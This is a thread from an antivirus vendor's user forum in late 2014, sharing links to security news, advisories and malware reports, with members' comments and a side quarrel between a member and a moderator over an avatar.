Photos and login credentials apparently leaked from third-party sites or apps that piggyback on these services.
The end result, if you used any of these 3rd party apps, still put you at risk.
The recommended procedure was to change your password and use two-step verification.
IMHO, it's always safer to go the extra step to make sure you're safe. :)
-
Photos and login credentials apparently leaked from third-party sites or apps that piggyback on these services.
The end result, if you used any of these 3rd party apps, still put you at risk.
Which is why very few (if any) of my passwords are shared between "services", and I never "Sign on from xxx". It's just not worth the risk. I'm trying to remember the security expert who had all his Apple i-stuff raped by (I think) Anonymous: he had everything linked. He couldn't even phone up from his iPhone, as his "Secret Questions" had been reset! IIRC, Amazon was involved at some stage, and had a lot of explaining to do. BUT: this fellow was the chief culprit, for linking everything.
A-a-a-n-d, I have CryptoPrevent to save me from CryptoLocker & clones 8) Reminder to self: upgrade every 1st-of-the-month!!!!!!
...and use two-step verification
I had a look at the recommendations, but how kludgy! The biggest problem is time. It's going to take some minutes to get the SMS from DropBox, while you've got the log-in screen open and ditto but much longer for the email. I've often waited up to 30 minutes for some "activation" emails to get back to me... My bank gave us this little gizmo that flashes up a number or something and gives you 36 seconds to get it into the form field with your log-on. So the time factor is eliminated. And--of course--it's a different number each time.
Gordon.
-
Hi gordon451,
Goes to show that we haven't arrived at a "secure" secure "IntheCloud" service.
Too many parties involved to keep it secure and big PEBKAC issues,
which maybe are the worst of the pack.
I don't want that on my back all the time.
polonus
-
Vulnerability in Microsoft OLE Could Allow Remote Code Execution
https://technet.microsoft.com/library/security/3010060
https://support.microsoft.com/kb/3010060
-
Tor-node detected that adds malcode to downloads. Non-SSL downloads and lack of download certification puts us at risk.
Read: http://www.leviathansecurity.com/blog/the-case-of-the-modified-binaries/ blog article author = JOSH PITTS
pol
-
APT28: A Window into Russia's Cyber Espionage Operations
doc.pdf http://www.fireeye.com/resources/pdfs/apt28.pdf
-
Hackers breach some White House computers
http://www.washingtonpost.com/world/national-security/hackers-breach-some-white-house-computers/2014/10/28/2ddf2fa0-5ef7-11e4-91f7-5d89b5e8c251_story.html
-
Hackers breach some White House computers
http://www.washingtonpost.com/world/national-security/hackers-breach-some-white-house-computers/2014/10/28/2ddf2fa0-5ef7-11e4-91f7-5d89b5e8c251_story.html
Who spies on who(m) ???
Answer = Everyone spies on everyone else.
That way, no one has any secrets from the other Country. :)
It's called an equal opportunity hackers society.
-
Drupal Core - Highly Critical - Public Service announcement - PSA-2014-003
https://www.drupal.org/PSA-2014-003
-
Shellshock-related attacks: http://blog.trendmicro.com/trendlabs-security-intelligence/shellshock-related-attacks-continue-targets-smtp-servers/
pol
-
Unpatched Drupal Sites Vulnerable to SQL Injection Attacks: https://www.drupal.org/node/2357241
polonus
-
R7-2014-15: GNU Wget FTP Symlink Arbitrary Filesystem Access
https://community.rapid7.com/community/metasploit/blog/2014/10/28/r7-2014-15-gnu-wget-ftp-symlink-arbitrary-filesystem-access
-
Probably posted somewhere however I've always found this interesting!
http://www.bbc.com/news/uk-29891285
-
Swedish hacker finds 'serious' vulnerability in OS X Yosemite
http://www.macworld.com/article/2841965/swedish-hacker-finds-serious-vulnerability-in-os-x-yosemite.html
-
9.000 Dutch PCs infested with Rovnix-2: http://labs.bitdefender.com/2014/11/tracking-rovnix-2/
Re: http://totalhash.com/analysis/bac0cceeacfe2b91b05a961621f5cdd9323f0163
Infection comes via earlier Upatre infections that install Rovnix-bootkit and also "CryptoLock" ransomware and/or Necurs Trojan.
So watch out for ZIP-Malcode folks.
Earlier rovnix variants: http://winsec.se/?m=201405&paged=4
polonus
-
Interesting read! Thanks Pol. :)
-
Survey Says!
http://securitywatch.pcmag.com/hacking/329237-survey-shows-many-home-networks-are-insecure
-
America's worst-connected cities marching on into the digital divide - many households without any internet connection.
Read here for the whole list of 176 worst connected cities:
http://redistributingthefuture.blogspot.nl/2014/11/americas-worst-connected-big-cities.html
polonus
-
Home Depot discloses 53 million customer email addresses stolen!
https://blog.avast.com/2014/11/07/home-depot-discloses-that-53-million-customer-email-addresses-were-stolen/
-
Microsoft Security Bulletin Advance Notification for November 2014
https://technet.microsoft.com/library/security/ms14-nov
-
Postal Service Discloses Major Theft of Its Employees’ Personal Data
http://www.nytimes.com/2014/11/11/us/postal-service-discloses-major-data-theft.html
http://about.usps.com/news/fact-sheets/scenario/media-statement-final.pdf
-
Microsoft Security Bulletin Advance Notification for November 2014
https://technet.microsoft.com/library/security/ms14-nov
If you have EMET 5.0 installed, it breaks IE11; uninstalling EMET cures this.
-
Hacked servers turned against their own datacenter.
Canadian datacenter OVH attacked via the notorious Shell Shock Bash-hole.
That seriously meant "pain" for the super-hoster.
800 servers were involved in the attack!
See how they went offline: http://status.ovh.net/?do=details&id=8120
polonus
-
EMET 5.1 download here: http://www.microsoft.com/en-us/download/details.aspx?id=43714
polonus
-
Microsoft Security Bulletin Advance Notification for November 2014
https://technet.microsoft.com/library/security/ms14-nov
If you have EMET 5.0 installed, it breaks IE11; uninstalling EMET cures this.
Updating to EMET 5.1 (see Damian's link) before running MSU should help.
-
Potentially catastrophic bug bites all versions of Windows. Patch now
http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/
-
Potentially catastrophic bug bites all versions of Windows. Patch now
http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/
This again points out the importance of updating your OS and programs as soon as the updates are available.
Under normal circumstances, the sooner you update, the sooner you'll again be secure and protected against the
latest discovered vulnerabilities.
-
Potentially catastrophic bug bites all versions of Windows. Patch now
http://arstechnica.com/security/2014/11/potentially-catastrophic-bug-bites-all-versions-of-windows-patch-now/
"Virtually All"... So I assume this means, Windows 7/8/8.1/10 and maybe Vista?
Well, lots of updates for us to do! Thanks for the info Pondus!
-
Apparently, the flaw dates to Windows 95 and newer.
http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html
-
Apparently, the flaw dates to Windows 95 and newer.
http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html
I wonder if NSA / CIA / KGB / Mossad / ............ knew about it ???..... they are probably laughing now
-
80% of all Americans fear Government internet surveillance!
http://news.softpedia.com/news/80-Percent-of-Americans-Fear-Online-Government-Surveillance-464881.shtml
-
Apparently, the flaw dates to Windows 95 and newer.
http://www.huffingtonpost.com/2014/11/12/microsoft-fixes-windows-bug_n_6145246.html
I wonder if NSA / CIA / KGB / Mossad / ............ knew about it ???..... they are probably laughing now
Likely. 19 years is a long time for a vulnerability to not be well known by everyone in IT security, not to mention the hackers. :'(
-
Worldwide Antivirus Vendor Market Share
https://www.opswat.com/about/media/reports/antivirus-october-2014
-
Worldwide Antivirus Vendor Market Share
https://www.opswat.com/about/media/reports/antivirus-october-2014
Caution when looking at these statistics. Windows Defender is turned on by default
in all Windows 8 computers. These stats don't give a true picture since installing a third party
turns off Defender but doesn't remove it from the list.
It's nice to see that Avast is listed as the most used third party AV.
-
Trojan horse being spread via malicious Tor-exit-nodes as a wrapper: http://www.f-secure.com/weblog/archives/00002764.html
Source: FSLabs.
polonus
-
Trojan horse being spread via malicious Tor-exit-nodes as a wrapper: http://www.f-secure.com/weblog/archives/00002764.html
Source: FSLabs.
polonus
Trojan-Dropper:W32/OnionDuke.A
https://www.virustotal.com/en/file/19972cc87c7653aff9620461ce459b996b1f9b030d7c8031df0c8265b73f670d/analysis/
Backdoor:W32/OnionDuke.A
https://www.virustotal.com/en/file/0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade/analysis/
Backdoor:W32/OnionDuke.B
https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/
-
Hi Pondus,
Thank you for this additional scan info. Also read this: http://sensorstechforum.com/onionduke-malware-used-in-apt-attacks-through-the-tor-network/ Link article author = BertaB+
polonus
-
Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780)
https://technet.microsoft.com/en-us/library/security/MS14-068
-
Fake Windows 10 Activators Spreading All Over the Web
http://news.softpedia.com/news/Fake-Windows-10-Activators-Spreading-All-Over-the-Web-465227.shtml
-
Backdoor found in thousands and thousands of illegal CMS plug-ins and themes.
Read: http://blog.fox-it.com/2014/11/18/cryptophp-analysis-of-a-hidden-threat-inside-popular-content-management-systems/
We cannot determine the exact number of affected websites, but we estimate that at least a few thousand websites are compromised by CryptoPHP.
polonus
-
Malware now infecting users from popular website
http://blogs.norman.com/2014/for-consumption/malware-now-infecting-users-from-popular-website
-
Thank you Pondus for your heads-up on this. I hope everybody is convinced now they cannot be completely safe without a decent adblocker installed like ABP.
polonus
-
If you belong to the Malwarebytes Forum (Many of us do!) you should be aware of the following:
"bob3160,
I'm writing to let you know that on November 10th a vulnerability in our
forum software allowed a hacker to gain access to the server hosting our
community. We have no evidence of any personal data being stolen (nor do
we store any on our forums!) but as a precautionary measure we are
forcing all users to reset their passwords. The next time you attempt to
log in, please select the "Forgot Your Password?" link below and follow the steps.
https://forums.malwarebytes.org/index.php?app=core&module=global&section=lostpass
We've also migrated our community away from our servers and onto a service hosted by Invision Power Board. They know their software best and as vulnerabilities are discovered, they can patch them more quickly. I personally apologize for the inconvenience and if you have any questions, do not hesitate to contact me directly at
mkleczynski at malwarebytes.org.
Marcin"
-
If you belong to the Malwarebytes Forum (Many of us do!) you should be aware of the following:
"bob3160,
I'm writing to let you know that on November 10th a vulnerability in our
forum software allowed a hacker to gain access to the server hosting our
community. We have no evidence of any personal data being stolen (nor do
we store any on our forums!) but as a precautionary measure we are
forcing all users to reset their passwords. The next time you attempt to
log in, please select the "Forgot Your Password?" link below and follow the steps.
https://forums.malwarebytes.org/index.php?app=core&module=global&section=lostpass
We've also migrated our community away from our servers and onto a service hosted by Invision Power Board. They know their software best and as vulnerabilities are discovered, they can patch them more quickly. I personally apologize for the inconvenience and if you have any questions, do not hesitate to contact me directly at
mkleczynski at malwarebytes.org.
Marcin"
https://forums.malwarebytes.org/index.php?/topic/161236-malwarebytesorg-comprimised/
see post from RubbeR DuckY
-
Amnesty and EFF launch a scanner to detect government spyware:
Read about Detekt here: https://resistsurveillance.org/
polonus
-
Russian hackers hijack webcams worldwide!
http://ottawacitizen.com/technology/internet/russian-hackers-hijack-webcams-worldwide-including-at-least-four-in-ottawa
-
Hi all,
Sorry if this is the wrong place to put my question.
Having a small problem with Windows update KB3011780: it says it failed to download and now I have to switch off my computer manually.
I presume this update has something to do with it???. Not being a tech wiz, I have no idea.
I read in another forum that Avast might have something to do with it, any ideas?? >:(
-
Having a small problem with Windows update KB3011780: it says it failed to download and now I have to switch off my computer manually.
I presume this update has something to do with it???. Not being a tech wiz, I have no idea.
I read in another forum that Avast might have something to do with it, any ideas?? >:(
-> https://forum.avast.com/index.php?topic=160717.0
-
Security Advisory – High severity – WP-Statistics WordPress Plugin
http://blog.sucuri.net/2014/11/security-advisory-high-severity-wp-statistics-wordpress-plugin.html
-
Cigarettes with malware
http://news.softpedia.com/news/Chinese-Electronic-Cigarettes-Have-Malware-Planted-In-the-Charger-465664.shtml
(And they wonder why many people don't use WPS Office Free)
-
Look out for these Top Telemarketer Area Codes.
Aside from the popularly used toll-free number exchanges (800, 866, 877, 888, 855), the top spam area codes are:
1. 313 – Detroit
2. 713 – Houston
3. 954 – Fort Lauderdale
4. 404 – Atlanta
5. 484 – Eastern and Southeastern Pennsylvania
6. 407 – Orlando
7. 214 – Dallas
8. 202 – Washington, D.C.
9. 972 – Dallas
10. 205 – Birmingham
-
Regin: Top-tier espionage tool enables stealthy surveillance
http://www.symantec.com/connect/blogs/regin-top-tier-espionage-tool-enables-stealthy-surveillance
http://www.symantec.com/security_response/writeup.jsp?docid=2013-121221-3645-99
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
-
F-Secure
The Regin Espionage Toolkit https://www.f-secure.com/weblog/archives/00002766.html
-
16% of British adults hit by cyber attacks!
http://www.welivesecurity.com/2014/11/24/16-british-adults-hit-cyber-attacks/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+eset%2Fblog+%28ESET+Blog%3A+We+Live+Security%29
-
The following was posted in Avast Free/Pro/Suite yesterday, but no responses, yet. Perhaps this is a more appropriate topic to get the opinion of those concerned about security.
I was wondering if the issue mentioned here has been seen and addressed :
http://it.toolbox.com/blogs/securitymonkey/bypassing-email-av-is-ridiculously-easy-64458
If you go to the link, the implication for avast users seems to be that the mail shield has a potential gap.
-
Amnesty and EFF launch a scanner to detect government spyware:
Read about Detekt here: https://resistsurveillance.org/
UPDATE: The tool „Detekt“: what you should know about it
https://blog.gdatasoftware.com/blog/article/update-the-tool-detekt-what-you-should-know-about-it.html
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
Forgive me for being green and stupid, but when I clicked on polonus's link, as soon as the page appeared, a pop-up appeared with the message that a serious piece of malware had been blocked. If I had had a computer which was unprotected (and I do know of two such computers), what would the consequences have been of clicking on polonus's link? I do appreciate that the clicking on the link and the pop-up may have been purely coincidental, but I was just browsing the thread trying to understand what it was all about and for no particular reason clicked on the link.
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
Forgive me for being green and stupid, but when I clicked on polonus's link, as soon as the page appeared, a pop-up appeared with the message that a serious piece of malware had been blocked. If I had had a computer which was unprotected (and I do know of two such computers), what would the consequences have been of clicking on polonus's link? I do appreciate that the clicking on the link and the pop-up may have been purely coincidental, but I was just browsing the thread trying to understand what it was all about and for no particular reason clicked on the link.
vital info is missing ..... what does the popup say?
-
Sorry pondus, it all happened so fast that I didn't really take it all in. I don't even know whether it was avast or mbam. However, since my computer survived the first visit to your link, I will click on polonus's again and see what happens :)
-
Second click on polonus's link and no pop-up appeared. What might have caused it to appear the first time?
-
Regin advanced malware undetected from 2008 onwards:
http://www.tomsguide.com/us/regin-spyware-us-uk,news-19950.html
polonus
Forgive me for being green and stupid, but when I clicked on polonus's link, as soon as the page appeared, a pop-up appeared with the message that a serious piece of malware had been blocked. If I had had a computer which was unprotected (and I do know of two such computers), what would the consequences have been of clicking on polonus's link? I do appreciate that the clicking on the link and the pop-up may have been purely coincidental, but I was just browsing the thread trying to understand what it was all about and for no particular reason clicked on the link.
vital info is missing ..... what does the popup say?
What I've highlighted in red is roughly what the pop-up said, pondus.
-
Second click on polonus's link and no pop-up appeared. What might have caused it to appear the first time?
Well, the popup would have all the info of what was blocked .... file / url .... so without that info it is impossible to say.
If you have not rebooted since the popup, right click the avast tray icon .... select show last popup.
-
The last pop-up was something about Christmas :(
-
DroidJack RAT: A tale of how budding entrepreneurism can turn to cybercrime
http://www.symantec.com/connect/blogs/droidjack-rat-tale-how-budding-entrepreneurism-can-turn-cybercrime
-
Hacker Collective Anonymous promises to take down Missouri Government and Banks
http://news.softpedia.com/news/Hacker-Collective-Anonymous-Promises-to-Take-Down-Missouri-Government-and-Bank-Sites-465978.shtml
-
Detekt Tool detects spyware that general av does not detect:
http://www.amnesty.org/en/news/new-tool-spy-victims-detect-government-surveillance-2014-11-20
Do some av turn a blind eye on official government spyware? Read here: http://www.theregister.co.uk/2013/11/05/av_response_state_snooping_challenge/
polonus
-
Websites with security seals are not a priori more secure than sites without such a seal:
https://vagosec.org/2014/11/clubbing-seals/
This scanner seal is even questionable in the eyes of WOT web rep: http://www.scanverify.com/vulnerability_scanner_free/vulnerability_scanner_free.php
-> https://www.mywot.com/en/scorecard/scanverify.com?utm_source=addon&utm_content=rw-viewsc
polonus
-
Amnesty and EFF launch a scanner to detect government spyware:
Read about Detekt here: https://resistsurveillance.org/
UPDATE: The tool „Detekt“: what you should know about it
https://blog.gdatasoftware.com/blog/article/update-the-tool-detekt-what-you-should-know-about-it.html
What Detekt was really all about
https://medium.com/@botherder/what-detekt-was-really-all-about-aaecfb17b6d5
-
APT detection is easily circumvented by BAB0 malware:
https://blog.mrg-effitas.com/new-anti-apt-tools-are-no-silver-bullets-an-independent-test-of-apt-attack-detection-appliances/
polonus
-
Using Password Managers is like committing cyber security suicide.
Read: http://securityintelligence.com/cybercriminals-use-citadel-compromise-password-management-authentication-solutions/
Specific KeePass, Password Safe and neXus Personal Security Client executables are being monitored by the malware,
just as easily as if you'd post-fixed the general password to your screen...
polonus
-
Syrian hackers subvert Ad networks!
http://www.databreachtoday.com/syrian-hackers-subvert-ad-network-a-7621
-
Exclusive: FBI warns of 'destructive' malware in wake of Sony attack
http://www.reuters.com/article/2014/12/02/us-sony-cybersecurity-malware-idUSKCN0JF3FE20141202
-
Sony to officially name North Korea as source of hacking.
http://recode.net/2014/12/03/sony-to-officially-name-north-korea-as-source-of-hack-attack/
Possibly due to the Sony produced movie "The Interview".
-
Sony to officially name North Korea as source of hacking.
http://recode.net/2014/12/03/sony-to-officially-name-north-korea-as-source-of-hack-attack/
Possibly due to the Sony produced movie "The Interview".
It's always nice to know who did the hacking. Knowing who unfortunately doesn't change the fact that the hack occurred nor
does it change the fact that the "private" information has been exposed.
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/
They have been saying captcha is a thing of the past for some time - yet here it still is.
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/
They have been saying captcha is a thing of the past for some time - yet here it still is.
I'm sure some of the new users on this forum would hope the use of the captcha would end. :)
-
Is the captcha a thing of the past?
http://www.wired.com/2014/12/google-one-click-recaptcha/
They have been saying captcha is a thing of the past for some time - yet here it still is.
I'm sure some of the new users on this forum would hope the use of the captcha would end. :)
Yep, that is the pain of captcha, for it to be worth using it has to be difficult.
-
Hmmmm... do you think this might have something to do with Google's latest "Hummingbird" technology, which analyses your searches and uses algorithms and synonyms to present you with better and more relevant ads!...
A little bit Orwellian if you ask me... just wanted to know what the experts think of it and whether the point I made ties in.
xxx
PEri
-
Thank you for changing your Avatar.
This forum is accessed by youngsters.
Thanks. :)
-
That's odd because I've been using it whilst speaking to Essex boy and Pondus, who have not had a problem with it..
Do you not take your children/grandchildren to the beach?
Do you not allow art in your house?
I suggest you avert your eyes.. in the politest way possible.
In fact I am really insulted that you have felt the need to point this out to me!... it makes no difference, but I am a mother and I find that your inference is extremely insulting ... and I have not accessed the children's area and posted in there... I do hope this is a case of over-sensitivity on your part.
-
The avatar could be construed as offensive as could the "personal message".
Both should be changed asap.
-
You were asked politely; not only is your avatar close to the knuckle, your response to a polite request is as insulting as you suggest the polite request was.
My argument would now be that if I changed the avatar, people reading the comment would presume my choice of picture was a lot worse than what it is... I'll be finishing my clear-up and closing my account and using another AV.... I am absolutely disgusted at this.. ESSEX BOY and PONDUS have not commented on this and now someone is pulling their weight because I've upset them by replying to their warning publicly...
I would also like to add that I have used my own name on this forum and my professional email address.. I find it incredibly libelous to have this all pinned against my name on someone's arbitrary judgement!
-
And I notice the two moderators who previously interacted with me have had nothing to say on the matter..
-
Hi peri.ramadan,
I personally do not take any objection here, but note that such reactions could be a cultural position.
Americans as a rule are known to be far more puritan where these issues are concerned.
Any "explicit picture" could evoke some Victorian reaction,
while we Europeans feel more shocked by violence etc, where Americans see no big issue.
Law and customs of the land, I assume... ;D
polonus
-
And I notice the two moderators who previously interacted with me have had nothing to say on the matter..
Thanks for the fix. I personally had no objections to the picture you used and you're correct, some live bathing beauties show much more.
This is however a family oriented forum. :)
-
Well, maybe a few of the other moderators should take note of the way you are able to convey a point without coming across as bigoted and rude!...
With the climate today (in Europe, I politely add - as I now understand there is an evident difference!) there is a lot of finger-pointing and witch-hunting concerning child abuse... I now have my name next to something that suggests that!...
I am uninstalling my Avast antivirus and welcome the Americans and prudes to this forum... maybe a little focus on cultural understanding both ways across the Atlantic.. I'm not going to start some vendetta as there are prudish and hypersensitive people EVERYWHERE... but perhaps a meeting amongst the moderators on this site to ensure this doesn't happen again to someone who has joined the community politely looking for help and asking valid, insightful questions... and one moderator picking up on something they do not like should perhaps be discussed between them and the moderators who have built a rapport and have interacted with the member in question, so it does not look like an arbitrary smack from one moderator with a bee in their bonnet....
Sorry I ever bothered anyone on here.. I am extremely embarrassed by Avast as a whole and won't be using this program.. when my business is up and running and as it grows, moderators have destroyed a relationship on behalf of Avast and there should be some recourse for that!
-
I personally do not take any objection here, but note that such reactions could be a cultural position.
With a name like Ramadan..?? I'm being told about cultural sensitivities on Avast!
-
but perhaps a meeting amongst the moderators on this site to ensure this doesnt happen again to someone
I think you're being a bit hyper sensitive. Changing an avatar is something many do on a regular basis.
Uninstalling Avast because of this makes no sense.
Have a great day and go on with life. This kind of petty issue is too meaningless to get upset about. :)
-
We'll see how Vincent Steckler feels about this one-way street you have laid around here.
I am not hypersensitive to the fact I have been asked to change my avatar; I am disgusted at how you have decided to go about it.
I've contacted Vincent as perhaps a tighter leash is required for this forum as it represents the whole company..
It is a matter of principle.
-
Hi peri.ramadan,
Let this not get into your hair, nothing to overreact about and just a misunderstanding.
This is how it works. For instance, when I burp at home over my meal, everybody says I have bad manners and I am a jerk.
When I am out in China and burp after swallowing my noodles in a restaurant, then that is taken as a sign that I have enjoyed my meal and the waiter is very satisfied.
When I eat spaghetti in America I can use a fork and a spoon; if I had Italian relatives from some parts of Italy, eating with just a fork is the way.
Table manners and forum manners, we haven't come to the latest word yet.
Welcome and be our guest. The first thing bob3160 did when I entered the forum, now over ten years ago, was pointing out my avatar was too big in size. That is a long time ago and since then we became good friends, so hang on - it cannot be all that bad.
polonus
-
No, I am sorry, I am totally disgusted. When one of the two moderators I have already named decides to stand up and be counted for perhaps not saying anything to begin with.. why have I got a warning? And why has the mention of children been made at me..? It is a stigma which I refuse to have attached to my name ... now I have changed it, like I have already said, people can presume what they like was there...
I have already contacted Mr Steckler because bob's conduct was libelous and I won't stand for that virtually or in any "real" setting.
This is not the same as burping; this is being treated like some type of child abuse advocate.
-
http://www.lgbtqnation.com/2013/08/scotland-man-ordered-to-pay-61k-for-calling-teacher-a-pedophile-on-twitter/
-
http://www.lgbtqnation.com/2013/08/scotland-man-ordered-to-pay-61k-for-calling-teacher-a-pedophile-on-twitter/
Maybe you need a little education or a better understanding of the language ??? I don't know what your problem is in here but, no one called you any such thing.
A simple request to change your avatar has for some ridiculous reason on your part been turned into a name calling contest.
Hopefully Vincent will get back to you even if I think you're trying to make a mountain out of absolutely nothing.
Grow Up!
-
So a simple inbox message would not have sufficed then, bob? Public humiliation is a far more effective technique!
It has not turned into a name calling contest. I am acting on the principle that child welfare was brought up straight away.
Your conduct has been outrageous. Upon receiving an immediate response from Mr Steckler, I have sent the copy of my original avatar.
My understanding of the English language is fine, thank you; I hope your understanding of law is on par though, as you may be needing it, sir.
-
So a simple inbox message would not have sufficed then, bob? Public humiliation is a far more effective technique!
It has not turned into a name calling contest. I am acting on the principle that child welfare was brought up straight away.
Your conduct has been outrageous. Upon receiving an immediate response from Mr Steckler, I have sent the copy of my original avatar.
My understanding of the English language is fine, thank you; I hope your understanding of law is on par though, as you may be needing it, sir.
Wasting any more replies on this is senseless. Since you seem to be super sensitive and assume anything asked of you is a personal attack,
I leave you to your own conclusions.
Threatening me or anyone else with a lawsuit is however not looked upon lightly. Please choose your words more wisely.
-
Thank you for changing your Avatar.
This forum is accessed by youngsters.
Thanks. :)
I'm with Bob here.
But I really suggest we turn back to topic (security warnings), please.
-
Fake free codes scam affects PSN and Steam users
https://blog.avast.com/2014/12/05/fake-free-codes-scam-affects-psn-steam-users/
-
Our qualified removers will still have a lot to do as you can conclude from this report: http://www.av-comparatives.org/wp-content/uploads/2014/12/avc_rem_201411_en.pdf (http://www.av-comparatives.org/removal-tests/).
AV solutions are not always able to completely cleanse malware from your computer, leaving executable files, MBR or registry changes, changed hosts files etc. behind.
polonus
-
AIS didn't fare much better here http://www.av-comparatives.org/wp-content/uploads/2014/11/avc_per_201410_en.pdf
-
New moves in the so-called second crypto-war: http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html
Judge Richard Posner criticized mobile OS companies for enabling end-to-end encryption in their newest software. “I’m shocked at the thought that a company would be permitted to manufacture an electronic product that the government would not be able to search,” he said.
polonus
-
New moves in the so-called second crypto-war: http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html
Judge Richard Posner criticized mobile OS companies for enabling end-to-end encryption in their newest software. “I’m shocked at the thought that a company would be permitted to manufacture an electronic product that the government would not be able to search,” he said.
polonus
Big brother is alive and well.
-
New moves in the so-called second crypto-war: http://www.pcworld.com/article/2855776/judge-give-nsa-unlimited-access-to-digital-data.html
Judge Richard Posner criticized mobile OS companies for enabling end-to-end encryption in their newest software. “I’m shocked at the thought that a company would be permitted to manufacture an electronic product that the government would not be able to search,” he said.
polonus
Big brother is alive and well.
Maybe if these judges were forced to live in a country where there is no freedom they would realize how precious freedom really is ???
-
VirRnsm, the ransomware revisited: https://nakedsecurity.sophos.com/2014/12/05/notes-from-sophoslabs-ransomware-with-a-difference-this-one-is-a-true-virus/ link article author Sophos's Paul Ducklin
polonus
-
Do not fall victim to scam/spam robots (invite dot com) while Skype ads are known to be compromised.
Read about such ill bot activity here: https://forum.avast.com/index.php?topic=162424.msg1160190#msg1160190
Block everyone outside of your known contacts!
polonus
-
Microsoft Security Bulletin Advance Notification for December 2014
https://technet.microsoft.com/library/security/ms14-dec
-
There should have been more openness on government malware: http://www.technologyreview.com/view/533136/antivirus-companies-should-be-more-open-about-their-government-malware-discoveries/ link article author: Bruce Schneier
polonus
-
There should have been more openness on government malware: http://www.technologyreview.com/view/533136/antivirus-companies-should-be-more-open-about-their-government-malware-discoveries/ link article author: Bruce Schneier
polonus
Honesty in (ANY) Government hasn't existed for a lot longer than I've been around. (That's been a few years. :) )
-
Kaspersky: That 2 years we took to warn you about Regin ? We had GOOD REASON
http://www.theregister.co.uk/2014/12/05/regin_kaspersky/
-
(0Day) Microsoft Internet Explorer display:run-in Use-After-Free Remote Code Execution Vulnerability
http://zerodayinitiative.com/advisories/ZDI-14-403/
-
“Pardon my intrusion; my name is…”
https://blog.malwarebytes.org/fraud-scam/2014/12/pardon-my-intrusion-my-name-is/
Maybe Bob got one of these?...... he usually gets them all
-
Online medical billing service tricked people...
https://nakedsecurity.sophos.com/2014/12/08/online-medical-bill-site-tricked-people-to-hand-over-health-records/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
-
Dangers of not changing the default password revealed in webcam exposé
http://blogs.norman.com/2014/for-consumption/dangers-of-not-changing-the-default-password-revealed-in-webcam-expose
-
Read about new Poodle exploit: https://community.qualys.com/blogs/securitylabs/2014/12/08/poodle-bites-tls
and test your domain for it: https://www.ssllabs.com/ssltest/
If this is not a domain you own you are not to publish eventual scan results
Typosquatters are cashing in great time now.
polonus
-
Microsoft, Google, Others Threaten to Sue Adblock Plus Creator
http://news.softpedia.com/news/Microsoft-Google-Others-Threaten-to-Sue-Adblock-Plus-Creator-467035.shtml
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
polonus
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
polonus
I would call that a Monopoly and something should be done about that....
Maybe break up that country like has been suggested for Google ???
-
More about the Sony hacking.
http://mashable.com/2014/12/09/sony-hack-details/
http://www.ibtimes.com/sony-corporation-strikes-back-its-using-amazon-servers-attack-torrent-sites-report-1748849
http://time.com/3623456/sony-hack-unprecedented/
http://www.ibtimes.com/sony-corporation-hackers-release-second-wave-private-data-1744076
http://www.bidnessetc.com/30495-more-misery-for-sony-corporation-hacked-again/
-
Project Goliath: Sony leaks reveal alleged MPAA plot against Google
http://rt.com/news/214167-goliath-sony-hack-google/
-
Hi Abruptum,
Ad-Industry versus Content-Industry.
polonus
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
polonus
I would call that a Monopoly and something should be done about that....
Maybe break up that country like has been suggested for Google ???
deleted
-
Chinese responsible for 85 per cent of website scams
Re: http://www.theregister.co.uk/2014/12/10/chinese_responsible_for_85_per_cent_of_website_scams/
polonus
I would call that a Monopoly and something should be done about that....
Maybe break up that country like has been suggested for Google ???
Not sure if you're serious or not Bob, are you suggesting that China be broken up? The 3rd largest country on the planet, the country with the largest population on the planet, the country with the largest economy on the planet. So who will break it up, the United States? Not going to happen, the US has enough problems of its own and probably 50% of the planet wishes they would break up. I really hope you weren't serious.
Why are you trying to turn a satirical answer into a political discussion ???
Here in the US it's been a practice that when a company gets too big and powerful, you slap a monopoly tag on them and break them up.
(Then they usually wait for the little companies to get big enough to do it all over again....)
-
Dutch users will massively leave facebook now and go to seen.is or Ello
because of the new Facebook terms that seem just one bridge too far for many of them.
Also read: http://blog.megafanapps.com/2014/11/26/will-people-massively-delete-their-facebook-profiles-on-december-31/
When you go there every 10 minutes to check on facebook,
you could give this a try: http://time.com/2969873/99-days-of-freedom-facebook-experiment/
I personally have no facebook or social media account, but I found the above news online interesting.
polonus
-
Dutch users will massively leave facebook now and go to seen.is or Ello
because of the new Facebook terms that seem just one bridge too far for many of them.
Also read: http://blog.megafanapps.com/2014/11/26/will-people-massively-delete-their-facebook-profiles-on-december-31/
When you go there every 10 minutes to check on facebook,
you could give this a try: http://time.com/2969873/99-days-of-freedom-facebook-experiment/
I personally have no facebook or social media account, but I found the above news online interesting.
polonus
Targeted ads and the ability to reject any ads you don't want including removing that ad on all devices that have Facebook installed.
Am I missing something but I don't see anything that's harmful ??? An improvement yes.
-
Hi bob3160,
